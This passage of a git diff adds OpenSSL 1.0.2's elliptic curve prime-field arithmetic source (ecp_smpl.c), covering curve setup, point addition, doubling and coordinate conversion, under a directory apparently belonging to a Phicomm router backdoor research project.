+                ECerr(EC_F_EC_GFP_SIMPLE_OCT2POINT, EC_R_INVALID_ENCODING);
+                goto err;
+            }
+        }
+
+        if (!EC_POINT_set_affine_coordinates_GFp(group, point, x, y, ctx))
+            goto err;
+    }
+
+    /* test required by X9.62 */
+    if (!EC_POINT_is_on_curve(group, point, ctx)) {
+        ECerr(EC_F_EC_GFP_SIMPLE_OCT2POINT, EC_R_POINT_IS_NOT_ON_CURVE);
+        goto err;
+    }
+
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_smpl.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_smpl.c
new file mode 100644
index 0000000..2b84821
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/ec/ecp_smpl.c
@@ -0,0 +1,1418 @@
+/* crypto/ec/ecp_smpl.c */
+/*
+ * Includes code written by Lenka Fibikova <fibikova@exp-math.uni-essen.de>
+ * for the OpenSSL project. Includes code written by Bodo Moeller for the
+ * OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2002 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * Portions of this software developed by SUN MICROSYSTEMS, INC.,
+ * and contributed to the OpenSSL project.
+ */
+
+#include <openssl/err.h>
+#include <openssl/symhacks.h>
+
+#ifdef OPENSSL_FIPS
+# include <openssl/fips.h>
+#endif
+
+#include "ec_lcl.h"
+
+const EC_METHOD *EC_GFp_simple_method(void)
+{
+    static const EC_METHOD ret = {
+        EC_FLAGS_DEFAULT_OCT,
+        NID_X9_62_prime_field,
+        ec_GFp_simple_group_init,
+        ec_GFp_simple_group_finish,
+        ec_GFp_simple_group_clear_finish,
+        ec_GFp_simple_group_copy,
+        ec_GFp_simple_group_set_curve,
+        ec_GFp_simple_group_get_curve,
+        ec_GFp_simple_group_get_degree,
+        ec_GFp_simple_group_check_discriminant,
+        ec_GFp_simple_point_init,
+        ec_GFp_simple_point_finish,
+        ec_GFp_simple_point_clear_finish,
+        ec_GFp_simple_point_copy,
+        ec_GFp_simple_point_set_to_infinity,
+        ec_GFp_simple_set_Jprojective_coordinates_GFp,
+        ec_GFp_simple_get_Jprojective_coordinates_GFp,
+        ec_GFp_simple_point_set_affine_coordinates,
+        ec_GFp_simple_point_get_affine_coordinates,
+        0, 0, 0,
+        ec_GFp_simple_add,
+        ec_GFp_simple_dbl,
+        ec_GFp_simple_invert,
+        ec_GFp_simple_is_at_infinity,
+        ec_GFp_simple_is_on_curve,
+        ec_GFp_simple_cmp,
+        ec_GFp_simple_make_affine,
+        ec_GFp_simple_points_make_affine,
+        0 /* mul */ ,
+        0 /* precompute_mult */ ,
+        0 /* have_precompute_mult */ ,
+        ec_GFp_simple_field_mul,
+        ec_GFp_simple_field_sqr,
+        0 /* field_div */ ,
+        0 /* field_encode */ ,
+        0 /* field_decode */ ,
+        0                       /* field_set_to_one */
+    };
+
+#ifdef OPENSSL_FIPS
+    if (FIPS_mode())
+        return fips_ec_gfp_simple_method();
+#endif
+
+    return &ret;
+}
+
+/*
+ * Most method functions in this file are designed to work with
+ * non-trivial representations of field elements if necessary
+ * (see ecp_mont.c): while standard modular addition and subtraction
+ * are used, the field_mul and field_sqr methods will be used for
+ * multiplication, and field_encode and field_decode (if defined)
+ * will be used for converting between representations.
+ *
+ * Functions ec_GFp_simple_points_make_affine() and
+ * ec_GFp_simple_point_get_affine_coordinates() specifically assume
+ * that if a non-trivial representation is used, it is a Montgomery
+ * representation (i.e. 'encoding' means multiplying by some factor R).
+ */
+
+int ec_GFp_simple_group_init(EC_GROUP *group)
+{
+    BN_init(&group->field);
+    BN_init(&group->a);
+    BN_init(&group->b);
+    group->a_is_minus3 = 0;
+    return 1;
+}
+
+void ec_GFp_simple_group_finish(EC_GROUP *group)
+{
+    BN_free(&group->field);
+    BN_free(&group->a);
+    BN_free(&group->b);
+}
+
+void ec_GFp_simple_group_clear_finish(EC_GROUP *group)
+{
+    BN_clear_free(&group->field);
+    BN_clear_free(&group->a);
+    BN_clear_free(&group->b);
+}
+
+int ec_GFp_simple_group_copy(EC_GROUP *dest, const EC_GROUP *src)
+{
+    if (!BN_copy(&dest->field, &src->field))
+        return 0;
+    if (!BN_copy(&dest->a, &src->a))
+        return 0;
+    if (!BN_copy(&dest->b, &src->b))
+        return 0;
+
+    dest->a_is_minus3 = src->a_is_minus3;
+
+    return 1;
+}
+
+int ec_GFp_simple_group_set_curve(EC_GROUP *group,
+                                  const BIGNUM *p, const BIGNUM *a,
+                                  const BIGNUM *b, BN_CTX *ctx)
+{
+    int ret = 0;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *tmp_a;
+
+    /* p must be a prime > 3 */
+    if (BN_num_bits(p) <= 2 || !BN_is_odd(p)) {
+        ECerr(EC_F_EC_GFP_SIMPLE_GROUP_SET_CURVE, EC_R_INVALID_FIELD);
+        return 0;
+    }
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return 0;
+    }
+
+    BN_CTX_start(ctx);
+    tmp_a = BN_CTX_get(ctx);
+    if (tmp_a == NULL)
+        goto err;
+
+    /* group->field */
+    if (!BN_copy(&group->field, p))
+        goto err;
+    BN_set_negative(&group->field, 0);
+
+    /* group->a */
+    if (!BN_nnmod(tmp_a, a, p, ctx))
+        goto err;
+    if (group->meth->field_encode) {
+        if (!group->meth->field_encode(group, &group->a, tmp_a, ctx))
+            goto err;
+    } else if (!BN_copy(&group->a, tmp_a))
+        goto err;
+
+    /* group->b */
+    if (!BN_nnmod(&group->b, b, p, ctx))
+        goto err;
+    if (group->meth->field_encode)
+        if (!group->meth->field_encode(group, &group->b, &group->b, ctx))
+            goto err;
+
+    /* group->a_is_minus3 */
+    if (!BN_add_word(tmp_a, 3))
+        goto err;
+    group->a_is_minus3 = (0 == BN_cmp(tmp_a, &group->field));
+
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+int ec_GFp_simple_group_get_curve(const EC_GROUP *group, BIGNUM *p, BIGNUM *a,
+                                  BIGNUM *b, BN_CTX *ctx)
+{
+    int ret = 0;
+    BN_CTX *new_ctx = NULL;
+
+    if (p != NULL) {
+        if (!BN_copy(p, &group->field))
+            return 0;
+    }
+
+    if (a != NULL || b != NULL) {
+        if (group->meth->field_decode) {
+            if (ctx == NULL) {
+                ctx = new_ctx = BN_CTX_new();
+                if (ctx == NULL)
+                    return 0;
+            }
+            if (a != NULL) {
+                if (!group->meth->field_decode(group, a, &group->a, ctx))
+                    goto err;
+            }
+            if (b != NULL) {
+                if (!group->meth->field_decode(group, b, &group->b, ctx))
+                    goto err;
+            }
+        } else {
+            if (a != NULL) {
+                if (!BN_copy(a, &group->a))
+                    goto err;
+            }
+            if (b != NULL) {
+                if (!BN_copy(b, &group->b))
+                    goto err;
+            }
+        }
+    }
+
+    ret = 1;
+
+ err:
+    if (new_ctx)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+int ec_GFp_simple_group_get_degree(const EC_GROUP *group)
+{
+    return BN_num_bits(&group->field);
+}
+
+int ec_GFp_simple_group_check_discriminant(const EC_GROUP *group, BN_CTX *ctx)
+{
+    int ret = 0;
+    BIGNUM *a, *b, *order, *tmp_1, *tmp_2;
+    const BIGNUM *p = &group->field;
+    BN_CTX *new_ctx = NULL;
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL) {
+            ECerr(EC_F_EC_GFP_SIMPLE_GROUP_CHECK_DISCRIMINANT,
+                  ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+    }
+    BN_CTX_start(ctx);
+    a = BN_CTX_get(ctx);
+    b = BN_CTX_get(ctx);
+    tmp_1 = BN_CTX_get(ctx);
+    tmp_2 = BN_CTX_get(ctx);
+    order = BN_CTX_get(ctx);
+    if (order == NULL)
+        goto err;
+
+    if (group->meth->field_decode) {
+        if (!group->meth->field_decode(group, a, &group->a, ctx))
+            goto err;
+        if (!group->meth->field_decode(group, b, &group->b, ctx))
+            goto err;
+    } else {
+        if (!BN_copy(a, &group->a))
+            goto err;
+        if (!BN_copy(b, &group->b))
+            goto err;
+    }
+
+    /*-
+     * check the discriminant:
+     * y^2 = x^3 + a*x + b is an elliptic curve <=> 4*a^3 + 27*b^2 != 0 (mod p)
+     * 0 =< a, b < p
+     */
+    if (BN_is_zero(a)) {
+        if (BN_is_zero(b))
+            goto err;
+    } else if (!BN_is_zero(b)) {
+        if (!BN_mod_sqr(tmp_1, a, p, ctx))
+            goto err;
+        if (!BN_mod_mul(tmp_2, tmp_1, a, p, ctx))
+            goto err;
+        if (!BN_lshift(tmp_1, tmp_2, 2))
+            goto err;
+        /* tmp_1 = 4*a^3 */
+
+        if (!BN_mod_sqr(tmp_2, b, p, ctx))
+            goto err;
+        if (!BN_mul_word(tmp_2, 27))
+            goto err;
+        /* tmp_2 = 27*b^2 */
+
+        if (!BN_mod_add(a, tmp_1, tmp_2, p, ctx))
+            goto err;
+        if (BN_is_zero(a))
+            goto err;
+    }
+    ret = 1;
+
+ err:
+    if (ctx != NULL)
+        BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+int ec_GFp_simple_point_init(EC_POINT *point)
+{
+    BN_init(&point->X);
+    BN_init(&point->Y);
+    BN_init(&point->Z);
+    point->Z_is_one = 0;
+
+    return 1;
+}
+
+void ec_GFp_simple_point_finish(EC_POINT *point)
+{
+    BN_free(&point->X);
+    BN_free(&point->Y);
+    BN_free(&point->Z);
+}
+
+void ec_GFp_simple_point_clear_finish(EC_POINT *point)
+{
+    BN_clear_free(&point->X);
+    BN_clear_free(&point->Y);
+    BN_clear_free(&point->Z);
+    point->Z_is_one = 0;
+}
+
+int ec_GFp_simple_point_copy(EC_POINT *dest, const EC_POINT *src)
+{
+    if (!BN_copy(&dest->X, &src->X))
+        return 0;
+    if (!BN_copy(&dest->Y, &src->Y))
+        return 0;
+    if (!BN_copy(&dest->Z, &src->Z))
+        return 0;
+    dest->Z_is_one = src->Z_is_one;
+
+    return 1;
+}
+
+int ec_GFp_simple_point_set_to_infinity(const EC_GROUP *group,
+                                        EC_POINT *point)
+{
+    point->Z_is_one = 0;
+    BN_zero(&point->Z);
+    return 1;
+}
+
+int ec_GFp_simple_set_Jprojective_coordinates_GFp(const EC_GROUP *group,
+                                                  EC_POINT *point,
+                                                  const BIGNUM *x,
+                                                  const BIGNUM *y,
+                                                  const BIGNUM *z,
+                                                  BN_CTX *ctx)
+{
+    BN_CTX *new_ctx = NULL;
+    int ret = 0;
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return 0;
+    }
+
+    if (x != NULL) {
+        if (!BN_nnmod(&point->X, x, &group->field, ctx))
+            goto err;
+        if (group->meth->field_encode) {
+            if (!group->meth->field_encode(group, &point->X, &point->X, ctx))
+                goto err;
+        }
+    }
+
+    if (y != NULL) {
+        if (!BN_nnmod(&point->Y, y, &group->field, ctx))
+            goto err;
+        if (group->meth->field_encode) {
+            if (!group->meth->field_encode(group, &point->Y, &point->Y, ctx))
+                goto err;
+        }
+    }
+
+    if (z != NULL) {
+        int Z_is_one;
+
+        if (!BN_nnmod(&point->Z, z, &group->field, ctx))
+            goto err;
+        Z_is_one = BN_is_one(&point->Z);
+        if (group->meth->field_encode) {
+            if (Z_is_one && (group->meth->field_set_to_one != 0)) {
+                if (!group->meth->field_set_to_one(group, &point->Z, ctx))
+                    goto err;
+            } else {
+                if (!group->
+                    meth->field_encode(group, &point->Z, &point->Z, ctx))
+                    goto err;
+            }
+        }
+        point->Z_is_one = Z_is_one;
+    }
+
+    ret = 1;
+
+ err:
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+int ec_GFp_simple_get_Jprojective_coordinates_GFp(const EC_GROUP *group,
+                                                  const EC_POINT *point,
+                                                  BIGNUM *x, BIGNUM *y,
+                                                  BIGNUM *z, BN_CTX *ctx)
+{
+    BN_CTX *new_ctx = NULL;
+    int ret = 0;
+
+    if (group->meth->field_decode != 0) {
+        if (ctx == NULL) {
+            ctx = new_ctx = BN_CTX_new();
+            if (ctx == NULL)
+                return 0;
+        }
+
+        if (x != NULL) {
+            if (!group->meth->field_decode(group, x, &point->X, ctx))
+                goto err;
+        }
+        if (y != NULL) {
+            if (!group->meth->field_decode(group, y, &point->Y, ctx))
+                goto err;
+        }
+        if (z != NULL) {
+            if (!group->meth->field_decode(group, z, &point->Z, ctx))
+                goto err;
+        }
+    } else {
+        if (x != NULL) {
+            if (!BN_copy(x, &point->X))
+                goto err;
+        }
+        if (y != NULL) {
+            if (!BN_copy(y, &point->Y))
+                goto err;
+        }
+        if (z != NULL) {
+            if (!BN_copy(z, &point->Z))
+                goto err;
+        }
+    }
+
+    ret = 1;
+
+ err:
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+int ec_GFp_simple_point_set_affine_coordinates(const EC_GROUP *group,
+                                               EC_POINT *point,
+                                               const BIGNUM *x,
+                                               const BIGNUM *y, BN_CTX *ctx)
+{
+    if (x == NULL || y == NULL) {
+        /*
+         * unlike for projective coordinates, we do not tolerate this
+         */
+        ECerr(EC_F_EC_GFP_SIMPLE_POINT_SET_AFFINE_COORDINATES,
+              ERR_R_PASSED_NULL_PARAMETER);
+        return 0;
+    }
+
+    return EC_POINT_set_Jprojective_coordinates_GFp(group, point, x, y,
+                                                    BN_value_one(), ctx);
+}
+
+int ec_GFp_simple_point_get_affine_coordinates(const EC_GROUP *group,
+                                               const EC_POINT *point,
+                                               BIGNUM *x, BIGNUM *y,
+                                               BN_CTX *ctx)
+{
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *Z, *Z_1, *Z_2, *Z_3;
+    const BIGNUM *Z_;
+    int ret = 0;
+
+    if (EC_POINT_is_at_infinity(group, point)) {
+        ECerr(EC_F_EC_GFP_SIMPLE_POINT_GET_AFFINE_COORDINATES,
+              EC_R_POINT_AT_INFINITY);
+        return 0;
+    }
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return 0;
+    }
+
+    BN_CTX_start(ctx);
+    Z = BN_CTX_get(ctx);
+    Z_1 = BN_CTX_get(ctx);
+    Z_2 = BN_CTX_get(ctx);
+    Z_3 = BN_CTX_get(ctx);
+    if (Z_3 == NULL)
+        goto err;
+
+    /* transform  (X, Y, Z)  into  (x, y) := (X/Z^2, Y/Z^3) */
+
+    if (group->meth->field_decode) {
+        if (!group->meth->field_decode(group, Z, &point->Z, ctx))
+            goto err;
+        Z_ = Z;
+    } else {
+        Z_ = &point->Z;
+    }
+
+    if (BN_is_one(Z_)) {
+        if (group->meth->field_decode) {
+            if (x != NULL) {
+                if (!group->meth->field_decode(group, x, &point->X, ctx))
+                    goto err;
+            }
+            if (y != NULL) {
+                if (!group->meth->field_decode(group, y, &point->Y, ctx))
+                    goto err;
+            }
+        } else {
+            if (x != NULL) {
+                if (!BN_copy(x, &point->X))
+                    goto err;
+            }
+            if (y != NULL) {
+                if (!BN_copy(y, &point->Y))
+                    goto err;
+            }
+        }
+    } else {
+        if (!BN_mod_inverse(Z_1, Z_, &group->field, ctx)) {
+            ECerr(EC_F_EC_GFP_SIMPLE_POINT_GET_AFFINE_COORDINATES,
+                  ERR_R_BN_LIB);
+            goto err;
+        }
+
+        if (group->meth->field_encode == 0) {
+            /* field_sqr works on standard representation */
+            if (!group->meth->field_sqr(group, Z_2, Z_1, ctx))
+                goto err;
+        } else {
+            if (!BN_mod_sqr(Z_2, Z_1, &group->field, ctx))
+                goto err;
+        }
+
+        if (x != NULL) {
+            /*
+             * in the Montgomery case, field_mul will cancel out Montgomery
+             * factor in X:
+             */
+            if (!group->meth->field_mul(group, x, &point->X, Z_2, ctx))
+                goto err;
+        }
+
+        if (y != NULL) {
+            if (group->meth->field_encode == 0) {
+                /*
+                 * field_mul works on standard representation
+                 */
+                if (!group->meth->field_mul(group, Z_3, Z_2, Z_1, ctx))
+                    goto err;
+            } else {
+                if (!BN_mod_mul(Z_3, Z_2, Z_1, &group->field, ctx))
+                    goto err;
+            }
+
+            /*
+             * in the Montgomery case, field_mul will cancel out Montgomery
+             * factor in Y:
+             */
+            if (!group->meth->field_mul(group, y, &point->Y, Z_3, ctx))
+                goto err;
+        }
+    }
+
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+int ec_GFp_simple_add(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a,
+                      const EC_POINT *b, BN_CTX *ctx)
+{
+    int (*field_mul) (const EC_GROUP *, BIGNUM *, const BIGNUM *,
+                      const BIGNUM *, BN_CTX *);
+    int (*field_sqr) (const EC_GROUP *, BIGNUM *, const BIGNUM *, BN_CTX *);
+    const BIGNUM *p;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *n0, *n1, *n2, *n3, *n4, *n5, *n6;
+    int ret = 0;
+
+    if (a == b)
+        return EC_POINT_dbl(group, r, a, ctx);
+    if (EC_POINT_is_at_infinity(group, a))
+        return EC_POINT_copy(r, b);
+    if (EC_POINT_is_at_infinity(group, b))
+        return EC_POINT_copy(r, a);
+
+    field_mul = group->meth->field_mul;
+    field_sqr = group->meth->field_sqr;
+    p = &group->field;
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return 0;
+    }
+
+    BN_CTX_start(ctx);
+    n0 = BN_CTX_get(ctx);
+    n1 = BN_CTX_get(ctx);
+    n2 = BN_CTX_get(ctx);
+    n3 = BN_CTX_get(ctx);
+    n4 = BN_CTX_get(ctx);
+    n5 = BN_CTX_get(ctx);
+    n6 = BN_CTX_get(ctx);
+    if (n6 == NULL)
+        goto end;
+
+    /*
+     * Note that in this function we must not read components of 'a' or 'b'
+     * once we have written the corresponding components of 'r'. ('r' might
+     * be one of 'a' or 'b'.)
+     */
+
+    /* n1, n2 */
+    if (b->Z_is_one) {
+        if (!BN_copy(n1, &a->X))
+            goto end;
+        if (!BN_copy(n2, &a->Y))
+            goto end;
+        /* n1 = X_a */
+        /* n2 = Y_a */
+    } else {
+        if (!field_sqr(group, n0, &b->Z, ctx))
+            goto end;
+        if (!field_mul(group, n1, &a->X, n0, ctx))
+            goto end;
+        /* n1 = X_a * Z_b^2 */
+
+        if (!field_mul(group, n0, n0, &b->Z, ctx))
+            goto end;
+        if (!field_mul(group, n2, &a->Y, n0, ctx))
+            goto end;
+        /* n2 = Y_a * Z_b^3 */
+    }
+
+    /* n3, n4 */
+    if (a->Z_is_one) {
+        if (!BN_copy(n3, &b->X))
+            goto end;
+        if (!BN_copy(n4, &b->Y))
+            goto end;
+        /* n3 = X_b */
+        /* n4 = Y_b */
+    } else {
+        if (!field_sqr(group, n0, &a->Z, ctx))
+            goto end;
+        if (!field_mul(group, n3, &b->X, n0, ctx))
+            goto end;
+        /* n3 = X_b * Z_a^2 */
+
+        if (!field_mul(group, n0, n0, &a->Z, ctx))
+            goto end;
+        if (!field_mul(group, n4, &b->Y, n0, ctx))
+            goto end;
+        /* n4 = Y_b * Z_a^3 */
+    }
+
+    /* n5, n6 */
+    if (!BN_mod_sub_quick(n5, n1, n3, p))
+        goto end;
+    if (!BN_mod_sub_quick(n6, n2, n4, p))
+        goto end;
+    /* n5 = n1 - n3 */
+    /* n6 = n2 - n4 */
+
+    if (BN_is_zero(n5)) {
+        if (BN_is_zero(n6)) {
+            /* a is the same point as b */
+            BN_CTX_end(ctx);
+            ret = EC_POINT_dbl(group, r, a, ctx);
+            ctx = NULL;
+            goto end;
+        } else {
+            /* a is the inverse of b */
+            BN_zero(&r->Z);
+            r->Z_is_one = 0;
+            ret = 1;
+            goto end;
+        }
+    }
+
+    /* 'n7', 'n8' */
+    if (!BN_mod_add_quick(n1, n1, n3, p))
+        goto end;
+    if (!BN_mod_add_quick(n2, n2, n4, p))
+        goto end;
+    /* 'n7' = n1 + n3 */
+    /* 'n8' = n2 + n4 */
+
+    /* Z_r */
+    if (a->Z_is_one && b->Z_is_one) {
+        if (!BN_copy(&r->Z, n5))
+            goto end;
+    } else {
+        if (a->Z_is_one) {
+            if (!BN_copy(n0, &b->Z))
+                goto end;
+        } else if (b->Z_is_one) {
+            if (!BN_copy(n0, &a->Z))
+                goto end;
+        } else {
+            if (!field_mul(group, n0, &a->Z, &b->Z, ctx))
+                goto end;
+        }
+        if (!field_mul(group, &r->Z, n0, n5, ctx))
+            goto end;
+    }
+    r->Z_is_one = 0;
+    /* Z_r = Z_a * Z_b * n5 */
+
+    /* X_r */
+    if (!field_sqr(group, n0, n6, ctx))
+        goto end;
+    if (!field_sqr(group, n4, n5, ctx))
+        goto end;
+    if (!field_mul(group, n3, n1, n4, ctx))
+        goto end;
+    if (!BN_mod_sub_quick(&r->X, n0, n3, p))
+        goto end;
+    /* X_r = n6^2 - n5^2 * 'n7' */
+
+    /* 'n9' */
+    if (!BN_mod_lshift1_quick(n0, &r->X, p))
+        goto end;
+    if (!BN_mod_sub_quick(n0, n3, n0, p))
+        goto end;
+    /* n9 = n5^2 * 'n7' - 2 * X_r */
+
+    /* Y_r */
+    if (!field_mul(group, n0, n0, n6, ctx))
+        goto end;
+    if (!field_mul(group, n5, n4, n5, ctx))
+        goto end;               /* now n5 is n5^3 */
+    if (!field_mul(group, n1, n2, n5, ctx))
+        goto end;
+    if (!BN_mod_sub_quick(n0, n0, n1, p))
+        goto end;
+    if (BN_is_odd(n0))
+        if (!BN_add(n0, n0, p))
+            goto end;
+    /* now  0 <= n0 < 2*p,  and n0 is even */
+    if (!BN_rshift1(&r->Y, n0))
+        goto end;
+    /* Y_r = (n6 * 'n9' - 'n8' * 'n5^3') / 2 */
+
+    ret = 1;
+
+ end:
+    if (ctx)                    /* otherwise we already called BN_CTX_end */
+        BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+int ec_GFp_simple_dbl(const EC_GROUP *group, EC_POINT *r, const EC_POINT *a,
+                      BN_CTX *ctx)
+{
+    int (*field_mul) (const EC_GROUP *, BIGNUM *, const BIGNUM *,
+                      const BIGNUM *, BN_CTX *);
+    int (*field_sqr) (const EC_GROUP *, BIGNUM *, const BIGNUM *, BN_CTX *);
+    const BIGNUM *p;
+    BN_CTX *new_ctx = NULL;
+    BIGNUM *n0, *n1, *n2, *n3;
+    int ret = 0;
+
+    if (EC_POINT_is_at_infinity(group, a)) {
+        BN_zero(&r->Z);
+        r->Z_is_one = 0;
+        return 1;
+    }
+
+    field_mul = group->meth->field_mul;
+    field_sqr = group->meth->field_sqr;
+    p = &group->field;
+
+    if (ctx == NULL) {
+        ctx = new_ctx = BN_CTX_new();
+        if (ctx == NULL)
+            return 0;
+    }
+
+    BN_CTX_start(ctx);
+    n0 = BN_CTX_get(ctx);
+    n1 = BN_CTX_get(ctx);
+    n2 = BN_CTX_get(ctx);
+    n3 = BN_CTX_get(ctx);
+    if (n3 == NULL)
+        goto err;
+
+    /*
+     * Note that in this function we must not read components of 'a' once we
+     * have written the corresponding components of 'r'. ('r' might the same
+     * as 'a'.)
+     */
+
+    /* n1 */
+    if (a->Z_is_one) {
+        if (!field_sqr(group, n0, &a->X, ctx))
+            goto err;
+        if (!BN_mod_lshift1_quick(n1, n0, p))
+            goto err;
+        if (!BN_mod_add_quick(n0, n0, n1, p))
+            goto err;
+        if (!BN_mod_add_quick(n1, n0, &group->a, p))
+            goto err;
+        /* n1 = 3 * X_a^2 + a_curve */
+    } else if (group->a_is_minus3) {
+        if (!field_sqr(group, n1, &a->Z, ctx))
+            goto err;
+        if (!BN_mod_add_quick(n0, &a->X, n1, p))
+            goto err;
+        if (!BN_mod_sub_quick(n2, &a->X, n1, p))
+            goto err;
+        if (!field_mul(group, n1, n0, n2, ctx))
+            goto err;
+        if (!BN_mod_lshift1_quick(n0, n1, p))
+            goto err;
+        if (!BN_mod_add_quick(n1, n0, n1, p))
+            goto err;
+        /*-
+         * n1 = 3 * (X_a + Z_a^2) * (X_a - Z_a^2)
+         *    = 3 * X_a^2 - 3 * Z_a^4
+         */
+    } else {
+        if (!field_sqr(group, n0, &a->X, ctx))
+            goto err;
+        if (!BN_mod_lshift1_quick(n1, n0, p))
+            goto err;
+        if (!BN_mod_add_quick(n0, n0, n1, p))
+            goto err;
+        if (!field_sqr(group, n1, &a->Z, ctx))
+            goto err;
+        if (!field_sqr(group, n1, n1, ctx))
+            goto err;
+        if (!field_mul(group, n1, n1, &group->a, ctx))
+            goto err;
+        if (!BN_mod_add_quick(n1, n1, n0, p))
+            goto err;
+        /* n1 = 3 * X_a^2 + a_curve * Z_a^4 */
+    }
+
+    /* Z_r */
+    if (a->Z_is_one) {
+        if (!BN_copy(n0, &a->Y))
+            goto err;
+    } else {
+        if (!field_mul(group, n0, &a->Y, &a->Z, ctx))
+            goto err;
+    }
+    if (!BN_mod_lshift1_quick(&r->Z, n0, p))
+        goto err;
+    r->Z_is_one = 0;
+    /* Z_r = 2 * Y_a * Z_a */
+
+    /* n2 */
+    if (!field_sqr(group, n3, &a->Y, ctx))
+        goto err;
+    if (!field_mul(group, n2, &a->X, n3, ctx))
+        goto err;
+    if (!BN_mod_lshift_quick(n2, n2, 2, p))
+        goto err;
+    /* n2 = 4 * X_a * Y_a^2 */
+
+    /* X_r */
+    if (!BN_mod_lshift1_quick(n0, n2, p))
+        goto err;
+    if (!field_sqr(group, &r->X, n1, ctx))
+        goto err;
+    if (!BN_mod_sub_quick(&r->X, &r->X, n0, p))
+        goto err;
+    /* X_r = n1^2 - 2 * n2 */
+
+    /* n3 */
+    if (!field_sqr(group, n0, n3, ctx))
+        goto err;
+    if (!BN_mod_lshift_quick(n3, n0, 3, p))
+        goto err;
+    /* n3 = 8 * Y_a^4 */
+
+    /* Y_r */
+    if (!BN_mod_sub_quick(n0, n2, &r->X, p))
+        goto err;
+    if (!field_mul(group, n0, n1, n0, ctx))
+        goto err;
+    if (!BN_mod_sub_quick(&r->Y, n0, n3, p))
+        goto err;
+    /* Y_r = n1 * (n2 - X_r) - n3 */
+
+    ret = 1;
+
+ err:
+    BN_CTX_end(ctx);
+    if (new_ctx != NULL)
+        BN_CTX_free(new_ctx);
+    return ret;
+}
+
+int ec_GFp_simple_invert(const EC_GROUP *group, EC_POINT *point, BN_CTX *ctx)
+{
+    if (EC_POINT_is_at_infinity(group, point) || BN_is_zero(&point->Y))
+        /* point is its own inverse */
+        return 1;
+
+    return BN_usub(&point->Y, &group->field, &point->Y);
+}
+
+int ec_GFp_simple_is_at_infinity(const EC_GROUP *group, const EC_POINT *point)
+{
+    return BN_is_zero(&point->Z);
+}
+
+int ec_GFp_simple_is_on_curve(const EC_GROUP *group, const EC_POINT *point,
+                              BN_CTX *ctx)
+{
